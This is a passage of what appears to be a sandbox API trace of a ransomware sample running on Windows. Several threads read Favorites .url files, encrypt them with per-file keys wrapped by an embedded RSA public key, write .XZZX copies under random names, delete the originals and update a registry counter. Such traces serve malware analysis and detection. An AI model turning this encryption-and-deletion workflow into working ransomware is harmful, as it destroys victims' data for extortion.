lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8a [0047.497] WriteFile (in: hFile=0x58c, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0xe, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0xe, lpOverlapped=0x0) returned 1 [0047.497] SetFilePointer (in: hFile=0x58c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x98 [0047.497] WriteFile (in: hFile=0x58c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0047.497] SetFilePointer (in: hFile=0x58c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9d [0047.497] SetErrorMode (uMode=0x1) returned 0x1 [0047.498] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0047.498] OutputDebugStringW (lpOutputString="end") [0047.498] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0047.498] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0047.498] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x3e42100) returned 1 [0047.499] CryptImportPublicKeyInfo (in: hCryptProv=0x3e42100, dwCertEncodingType=0x1, pInfo=0x3e40a80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e40ab0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e40ab8*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x3e27f38) returned 1 [0047.499] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0047.500] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0047.500] CryptEncrypt (in: hKey=0x3e27f38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0047.500] CryptEncrypt (in: hKey=0x3e27f38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e42188*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e42188*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0047.500] WriteFile (in: hFile=0x58c, lpBuffer=0x3e42188*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3e42188*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0047.500] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0047.500] WriteFile (in: hFile=0x58c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0047.500] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0047.501] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0047.501] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x590) returned 0x0 [0047.501] RegQueryValueExW (in: hKey=0x590, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x4a, lpcbData=0x417dfdc*=0x4) returned 0x0 [0047.501] RegCloseKey (hKey=0x590) returned 0x0 [0047.501] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x590) returned 0x0 [0047.501] RegSetValueExW (in: hKey=0x590, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x4b, cbData=0x4 | out: lpData=0x417dfec*=0x4b) returned 0x0 [0047.501] RegCloseKey (hKey=0x590) returned 0x0 [0047.501] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0047.502] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0047.502] CloseHandle (hObject=0x58c) returned 1 [0047.503] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0047.504] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0047.504] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url")) returned 1 [0047.506] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url")) returned 0 Thread: id = 170 os_tid = 0x87c [0047.448] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0047.448] lstrcpyW (in: lpString1=0x42cf460, lpString2="MSNBC News.url" | out: lpString1="MSNBC News.url") returned="MSNBC News.url" [0047.448] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0047.448] SetErrorMode (uMode=0x1) returned 0x1 [0047.448] lstrcpyW (in: lpString1=0x42cf860, lpString2="MSNBC News.url" | out: lpString1="MSNBC News.url") returned="MSNBC News.url" [0047.448] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0xc0e08bb7, Data2=0x7c05, Data3=0x4b6e, Data4=([0]=0xb8, [1]=0x53, [2]=0xe6, [3]=0xa2, [4]=0xde, [5]=0x77, [6]=0x75, [7]=0x57))) returned 0x0 [0047.448] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned 71 [0047.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0047.448] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\880F5E93248AC126C0E08BB728B7A56E.XZZX") returned 94 [0047.448] StrStrW (lpFirst="MSNBC News.url", lpSrch="XZZX") returned 0x0 [0047.448] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url", dwFileAttributes=0x20) returned 1 [0047.507] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x578 [0047.507] ReadFile (in: hFile=0x578, lpBuffer=0x34e068, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x34e068*, lpNumberOfBytesRead=0x42ce418*=0x85, lpOverlapped=0x0) returned 1 [0047.508] CloseHandle (hObject=0x578) returned 1 [0047.508] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e50000 [0047.508] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e60000 [0047.509] SetErrorMode (uMode=0x1) returned 0x1 [0047.509] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0047.509] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e42210) returned 1 [0047.512] CryptGenKey (in: hProv=0x3e42210, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e27db8) returned 1 [0047.829] CryptExportKey (in: hKey=0x3e27db8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0047.829] CryptExportKey (in: hKey=0x3e27db8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3e60000, pdwDataLen=0x42ce41c | out: pbData=0x3e60000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0047.829] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0047.830] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0047.830] CryptDestroyKey (hKey=0x3e27db8) returned 1 [0047.830] CryptReleaseContext (hProv=0x3e42298, dwFlags=0x0) returned 0 [0047.830] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\880F5E93248AC126C0E08BB728B7A56E.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\880f5e93248ac126c0e08bb728b7a56e.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5a4 [0047.830] WriteFile (in: hFile=0x5a4, lpBuffer=0x34e068*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x34e068*, lpNumberOfBytesWritten=0x42ce438*=0x85, lpOverlapped=0x0) returned 1 [0047.831] SetFilePointer (in: hFile=0x5a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x85 [0047.831] WriteFile (in: hFile=0x5a4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0047.831] SetFilePointer (in: hFile=0x5a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8a [0047.831] WriteFile (in: hFile=0x5a4, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x1c, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x1c, lpOverlapped=0x0) returned 1 [0047.831] SetFilePointer (in: hFile=0x5a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa6 [0047.831] WriteFile (in: hFile=0x5a4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0047.831] SetFilePointer (in: hFile=0x5a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xab [0047.831] SetErrorMode (uMode=0x1) returned 0x1 [0047.831] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0047.831] OutputDebugStringW (lpOutputString="end") [0047.832] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wh\x9eâ\x03`Õ,\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0047.832] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0047.832] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x3e42320) returned 1 [0047.832] CryptImportPublicKeyInfo (in: hCryptProv=0x3e42320, dwCertEncodingType=0x1, pInfo=0x3e40c20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e40c50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e40c58*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x3e27db8) returned 1 [0047.832] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0047.833] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0047.833] CryptEncrypt (in: hKey=0x3e27db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0047.833] CryptEncrypt (in: hKey=0x3e27db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e423a8*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e423a8*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0047.833] WriteFile (in: hFile=0x5a4, lpBuffer=0x3e423a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e423a8*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0047.833] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0047.833] WriteFile (in: hFile=0x5a4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0047.833] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0047.833] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0047.833] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x5a8) returned 0x0 [0047.833] RegQueryValueExW (in: hKey=0x5a8, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0x4b, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0047.833] RegCloseKey (hKey=0x5a8) returned 0x0 [0047.833] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x5a8) returned 0x0 [0047.833] RegSetValueExW (in: hKey=0x5a8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0x4c, cbData=0x4 | out: lpData=0x42cdfec*=0x4c) returned 0x0 [0047.834] RegCloseKey (hKey=0x5a8) returned 0x0 [0047.834] VirtualFree (lpAddress=0x3e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0047.834] VirtualFree (lpAddress=0x3e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0047.834] CloseHandle (hObject=0x5a4) returned 1 [0047.835] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0047.835] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0047.835] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url")) returned 1 [0047.836] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url")) returned 0 Thread: id = 171 os_tid = 0x88c [0047.655] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0047.655] lstrcpyW (in: lpString1=0x417f460, lpString2="Get Windows Live.url" | out: lpString1="Get Windows Live.url") returned="Get Windows Live.url" [0047.655] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0047.655] SetErrorMode (uMode=0x1) returned 0x1 [0047.655] lstrcpyW (in: lpString1=0x417f860, lpString2="Get Windows Live.url" | out: lpString1="Get Windows Live.url") returned="Get Windows Live.url" [0047.655] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0x9e51c4ae, Data2=0xdd83, Data3=0x47dc, Data4=([0]=0xb6, [1]=0x14, [2]=0xee, [3]=0x31, [4]=0x72, [5]=0x8a, [6]=0x19, [7]=0xd3))) returned 0x0 [0047.655] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned 77 [0047.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0047.655] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX") returned 94 [0047.655] StrStrW (lpFirst="Get Windows Live.url", lpSrch="XZZX") returned 0x0 [0047.655] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url", dwFileAttributes=0x20) returned 1 [0047.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x598 [0047.702] ReadFile (in: hFile=0x598, lpBuffer=0x34e0f8, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x34e0f8*, lpNumberOfBytesRead=0x417e418*=0x85, lpOverlapped=0x0) returned 1 [0047.702] CloseHandle (hObject=0x598) returned 1 [0047.702] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3ef0000 [0047.703] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3f00000 [0047.703] SetErrorMode (uMode=0x1) returned 0x1 [0047.703] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0047.703] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e42298) returned 1 [0047.706] CryptGenKey (in: hProv=0x3e42298, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e27d78) returned 1 [0047.886] CryptExportKey (in: hKey=0x3e27d78, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0047.886] CryptExportKey (in: hKey=0x3e27d78, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3f00000, pdwDataLen=0x417e41c | out: pbData=0x3f00000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0047.886] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0047.886] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0047.886] CryptDestroyKey (hKey=0x3e27d78) returned 1 [0047.886] CryptReleaseContext (hProv=0x3e42298, dwFlags=0x0) returned 0 [0047.886] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\9aa1db0a3e2db1949e51c4ae424595dc.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0047.887] WriteFile (in: hFile=0x588, lpBuffer=0x34e0f8*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x34e0f8*, lpNumberOfBytesWritten=0x417e438*=0x85, lpOverlapped=0x0) returned 1 [0047.887] SetFilePointer (in: hFile=0x588, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x85 [0047.887] WriteFile (in: hFile=0x588, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, 